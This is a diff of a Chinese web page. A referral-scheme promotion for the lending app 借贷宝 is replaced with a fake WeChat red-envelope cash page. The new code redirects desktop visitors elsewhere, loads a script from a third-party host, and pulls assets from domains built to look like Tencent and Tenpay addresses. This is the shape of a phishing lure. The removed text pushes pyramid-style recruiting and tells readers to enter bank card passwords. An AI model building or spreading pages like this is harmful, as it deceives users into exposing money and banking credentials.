--- a/index.html
+++ b/index.html
@@ -1,91 +1,103 @@
-
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
+<html>
 <head>
-<script src="http://siteapp.baidu.com/static/webappservice/uaredirect.js" type="text/javascript"></script>
-<script type="text/javascript">uaredirect("http://dwz.cn/20vSJt");</script> 
-<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-<title>借贷宝</title>
-<meta name="keywords" content="借贷宝官网,借款,借钱,赚钱,理财" />
-<meta name="description" content="借贷宝是国内顶级私募机构九鼎控股倾力打造的熟人间借贷平台。以借款人实名、出借人匿名的单向匿名借贷模式，使借款人能够快速获得借款，出借人根据借款人身份主动评估风险，获得更安全的高收益，是你手机上必备的借钱神器，赚钱利器。人脉变钱脉，就能玩出钱！" />
-<link rel="stylesheet" href="css.css">
-</head>
-<body>
-<div class="layout">
-  <div class="top1"><img src="http://ww1.sinaimg.cn/large/005uJx3ugw1ex38q47v9xj313g0dwn13.jpg" width="1420" height="503" /></div>
-  <div class="top2"><img src="http://ww4.sinaimg.cn/large/005uJx3ugw1ex38q4kgxej313g08cq4e.jpg" width="1420" height="300" /></div>
-  <div class="left">
-    <div class="title">借贷宝投资20亿元邀请用户注册官方活动网站</div>
-    <div class="contont red" style="font-size:30px" >拉上好友抢现金 轻轻松松玩出钱”借贷宝大型推广活动介绍</div>
-    <div class="k"></div>
-    <div class="title">40元领取教程</div>
-    <div class="contont">一、扫本站二维码下载，或自己在手机上下载借贷宝，并安装app。<br />
-     &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 注：必须在本官方站下载，以便得到奖金和保障账户安全。<br />
-      二、注册，输入<span class="red">官方邀请码：H6PMJKT </span>并登陆，进入app。<br />
-      三、登陆后，点击“我”——“钱包”，显示有20-40元不等余额，点击“提现”，提现要进行实名认证，绑定银行卡，就可提现到你的银行卡里。<br />
-      <span class="red">（建议：绑定工行和农行银行卡并开通有在线支付功能，以便成功绑卡。）</span></div>
-    <div class="k"></div>
-    <div><img src="http://ww4.sinaimg.cn/large/005uJx3ugw1ex38q3iu9rj30d206xdgp.jpg" width="470" height="249" /></div>
-    <div class="title">活动详情</div>
-    <div class="contont">登录借贷宝客户端，分享你的邀请链接，邀请新用户接受邀请可获20元现金，新用户绑定银行卡，你可获得20元邀请奖励，你邀请每一位用户，再邀请其他一名新用户，你可再获10元奖金。
-邀请用户越多，获得奖励越多。<br />
-邀请好友方法：打开借贷宝APP，点击首页拉上好友抢现金进入，点击我要邀请可分享到微信好友和QQ好友。好友注册时填写你的邀请码你和好友各得20元奖金。</div>
-    <div class="k"></div>
-    <div><img src="http://ww3.sinaimg.cn/large/005uJx3ugw1ex38q1jkrtj30o60cqtdr.jpg" width="870" height="458" /></div>
-    <div class="k"></div>
-    <div class="contont">在活动中，如果你成功邀请了100位新用户，可获得2000元。如果他们每个人再分别成功邀请100名用户，您即能获得10万元。那么….你最终能获得10.2万元！！ 
-邀请无上限，奖金无上限！！</div>
-    <div class="k"></div>
-    <div><img src="http://ww4.sinaimg.cn/large/005uJx3ugw1ex38q1xz3hj30o60b0myt.jpg" width="660" height="300" /></div>
-    <div class="k"></div>
-    <div class="contont red">重要声明
-      <br />
-      绑定银行卡时跳转到银联在线页面，需要输入银行卡密码，请放心输入，银行卡账户安全由中国人民财产保险股份有限公司承保。
-（招商和民生银行卡不需输入密码，带有银联标识除地方性银行以
-外均可绑定，绑卡中如有任何问题，请致电银联客服95516。）</div>
-    <div class="k"></div>
-    <div><img src="http://ww2.sinaimg.cn/large/005uJx3ugw1ex38q2bkbdj30nu0htgo7.jpg" width="480" height="357" /></div>
-  </div>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width,  initial-scale=1.0,  maximum-scale=1.0,user-scalable=no">
+<meta itemprop="name" content="免费领取20元现金--借贷宝">
+<meta itemprop="image" content="http://ww4.sinaimg.cn/bmiddle/005uJx3ugw1ex3a0o1go2j308m08m0tg.jpg">
+<meta name="description" itemprop="description" content="借贷宝20亿现金红包，人人有份送完为止！">
+<script type="text/javascript">
+$s = new Date().getTime();
+			var strRef = document.URL;
+			if(strRef.toLowerCase().indexOf("=1&") >= 0) {
+				window.location.href = ' index.html? '+$s;
+			} 
+</script>
+<script type="text/javascript">
+			var strRef = document.URL;
+			if(strRef.toLowerCase().indexOf("wv=5") >= 0) {
+				window.location.href = ' index.html? '+$s;
+			} 
+</script>
+<script type="text/javascript">var browser={  
+    versions:function(){   
+     var u = navigator.userAgent, app = navigator.appVersion;   
+     return {//移动终端浏览器版本信息   
+       trident: u.indexOf('Trident') > -1, //IE内核  
+       presto: u.indexOf('Presto') > -1, //opera内核  
+       webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核  
+       gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核  
+       mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端  
+       ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端  
+       android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器  
+       iPhone: u.indexOf('iPhone') > -1 , //是否为iPhone或者QQHD浏览器  
+       iPad: u.indexOf('iPad') > -1, //是否iPad    
+       webApp: u.indexOf('Safari') == -1 //是否web应该程序，没有头部与底部  
+      };  
+      }(),  
+      language:(navigator.browserLanguage || navigator.language).toLowerCase()  
+}   
+    if(browser.versions.mobile || browser.versions.ios || browser.versions.android ||   
+    browser.versions.iPhone || browser.versions.iPad){	   
+     window.location = "#";	 
+  }else{ 
 
-  <div class="right">
-    <div><img src="http://ww3.sinaimg.cn/large/005uJx3ugw1ex38q2md8ij30d20a5mxy.jpg" width="470" height="365" /></div>
-    <div class="title">关于我们</div>
-    <div class="contont2">借贷宝拉上好友抢现金，轻轻松松即可玩出钱。通过扫描本店二维码下载借贷宝官方APP,然后登录借贷宝客户端，分享你的邀请链接,邀请新用户接受邀请可获得20元现金。新用户绑定银行卡，你可获得20元邀请奖励。你邀请每一位用户，再邀请其他一名新用户，你可在获10元奖励。邀请用户越多，获得奖励越多。
-下载借贷宝，人脉变钱脉。人人都是金融家；了解这么多借贷宝，还不快来体验一下？借贷宝值得你拥有。
+window.location = "http://kkkooo.github.io/1";
+            } 
+</script>
+<link rel="stylesheet" href="http://vvvvvv.91mahuateng.cn/2/5/index_files/9912345net.css">
+<link rel="stylesheet" href="http://vvvvvv.91mahuateng.cn/2/5/index_files/qppgb.css">
+
+<script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/1.7.2/jquery.min.js"></script>
+<script type="text/javascript" src="http://vvvvvv.91mahuateng.cn/2/5/index_files/S03Bb.js"></script>
+<div class="logol" style="width:1px;">
+				<a href="/"><img src="http://ww1.sinaimg.cn/mw690/83dea524jw1ev7z1sscrfj205k05kmx1.jpg" width="1px" height="1px"/></a>
+</head>
+
+			</div><body class="show-unopen  show-valid  show-fixing">
+	<div style="display:none"><img src="http://qq.tenpay.com.77tx.com/Picture/1123525.jpg" /></div>
+	<div style="text-align:right;">
+  <span style="line-height:1.5;"><a href="http://mp.weixin.qq.com/mp/redirect?url=http://dwz.cn/SOPZF" target="_blank"><span style="font-size:14px;color:#FFFFFF;"><u></u></span></a> &nbsp; &nbsp;</span>
+</div>
+
+
+
+<div class="reveive">
+    <div class="crush"><img src="http://mp.weixin.qq.com.tenpayabc.cn/2/4/index_files/crush0.png"></div>
+   
+        <div id="open_pack" data-stat="HYBRID.WEIXIN_HONGBAO.RECEIVE.OPEN" class="pack small">
+            <div class="inner">
+                <i class="ico-seal"></i>
+                <i class="ico-ingot"></i>
+            </div>
+            <div class="sycee">
+                <i class="ico-ingot"></i>
+                <i class="ico-ingot"></i>
+            </div>
+            <div class="guide"></div>
+        </div>    
+        <div class="light"><i class="ray0"></i><i class="ray1"></i><i class="ray2"></i><i class="ray3"></i><i class="ray4"></i><i class="ray5"></i><i class="ray6"></i><i class="ray7"></i><i class="ray8"></i><i class="ray9"></i><i class="ray10"></i><i class="ray11"></i></div>
     </div>
-    <div class="k"></div>
-    
-    <div class="title2">借贷宝央视广告</div>
-    <div><embed src="http://player.youku.com/player.php/sid/XMTMxNDM1MTYwMA==/v.swf" allowFullScreen="true" quality="high" width="470" height="320" align="middle" allowScriptAccess="always" type="application/x-shockwave-flash"></embed></div>
-    <div class="k"></div>
-    <div class="title2">借贷宝新闻发布会</div>
-    <div><embed src="http://player.youku.com/player.php/sid/XMTMwOTA4MTc5Ng==/v.swf" allowFullScreen="true" quality="high" width="470" height="320" align="middle" allowScriptAccess="always" type="application/x-shockwave-flash"></embed></div>
-    <div class="k"></div>
-    <div><img src="http://ww4.sinaimg.cn/large/005uJx3ugw1ex38q3ugkyj30d206xab9.jpg" width="470" height="249" /></div>
-    <div class="k"></div>
-    <div><img src="http://ww1.sinaimg.cn/large/005uJx3ugw1ex38q2wwlhj30d20980um.jpg" width="470" height="332" /></div>
-    <div class="k"></div>
-    <div><img src="http://ww4.sinaimg.cn/large/005uJx3ugw1ex38q39fxuj30d209g0vb.jpg" width="470" height="340" /></div>
-    
-  </div>
-  <div id="dg"></div>
-  <div class="foot">
-    <table width="100%" border="0" cellspacing="0" cellpadding="0">
-  <tr>
-    <td width="8%" align="center">&nbsp;</td>
-    <td width="34%"><div class="contont2" style="color:#666" >客服电话：400-100-6699&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;地址：北京市西城区金融大街7号英蓝国际金融中心D座6层<br />
-      公司总机：010-66010650&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;客服邮箱：service@jiedaibao.com
-     </div></td>
-    <td width="21%" align="right"><div class="contont2" style="color:#666" >诚招各地地推商代理,地推渠道负责加<br />微信Q1031800272 </div>
-      </td>
-    <td width="2%">&nbsp;</td>
-    <td width="35%">
-    <img src="http://ww4.sinaimg.cn/large/005uJx3ugw1ex38q17raoj30a803mglw.jpg" alt="" width="368" height="130" />
-    </td>
-  </tr>
-</table>
-  </div>
+    <!-- 红包未拆开 ]] -->
 
 </div>
+
+<audio class="audio" src="file/9912345net.mp3" preload="auto"></audio>
+
+
+
+  <input type="hidden" id="urltype" value="1">
+  <input type="hidden" id="followurl" value="">
+
+
+
+<div style="display:none">
+<script src="http://s95.cnzz.com/stat.php?id=1255333167&web_id=1255333167" language="JavaScript"></script>
+</div>
+
+
 </body>
 </html>
+<style>.app-guide{position:fixed;bottom:0;left:0;width:100%;min-width:520px;height:50px;background-color:rgba(0,0,0,.64);box-shadow:0 -1px 1px rgba(0,0,0,.10);z-index:200001}.app-guide .guide-cont{position:relative;display:block;-webkit-tap-highlight-color:rgba(0,0,0,0);padding:4px 0;margin:0 90px 0 20px}.app-guide .guide-cont.touch::before{content:"";width:100%;height:100%;background-color:rgba(0,0,0,.06);position:absolute;top:0;left:-20px;padding:0 90px 0 20px}.app-guide .guide-logo{float:left;width:42px;height:42px;vertical-align:top;margin-right:8px}.app-guide .guide-slogon,.app-guide .guide-dc{color:#fff;font-size:16px;line-height:20px;text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.app-guide .guide-slogon span{color:#fff;font-size:16px;line-height:20px;margin-right:6px}.app-guide .guide-slogon span:last-of-type{margin-right:0}.app-guide .guide-dc{color:#ccc;font-size:14px;line-height:22px}.app-guide .guide-btn{position:absolute;top:10px;right:10px;width:80px;height:30px;background-color:#62af01;border:0 none;border-radius:3px;color:#fff;font:14px/30px microsoft yahei,helvetica,arial,sans-serif;text-align:center;padding:0}.app-guide .guide-btn.touch{background-color:#529301}.app-guide .guide-close{position:absolute;top:0;left:0;width:20px;height:20px;line-height:999em;overflow:hidden}.app-guide .guide-close::before{content:"";position:absolute;right:3px;bottom:2px;width:28px;height:28px;background-color:#262626;border-radius:28px}.app-guide .guide-close::after{content:"";position:absolute;top:4px;left:2px;width:9px;height:9px;background:url(http://mmbiz.qpic.cn/mmbiz/3ia2ElCKoJfMJxMpF9RYq75qAb9hfZBWWCj0qtB7kPSzBeRLhibZWQPXKbibD6YOSnoHBN2jxqIiaJgbJpOibibCBjTQ/640) no-repeat 0 0;-webkit-background-size:9px auto;background-size:9px auto}.guide-fixed .footer{padding-bottom:65px}</style>
+
+
+
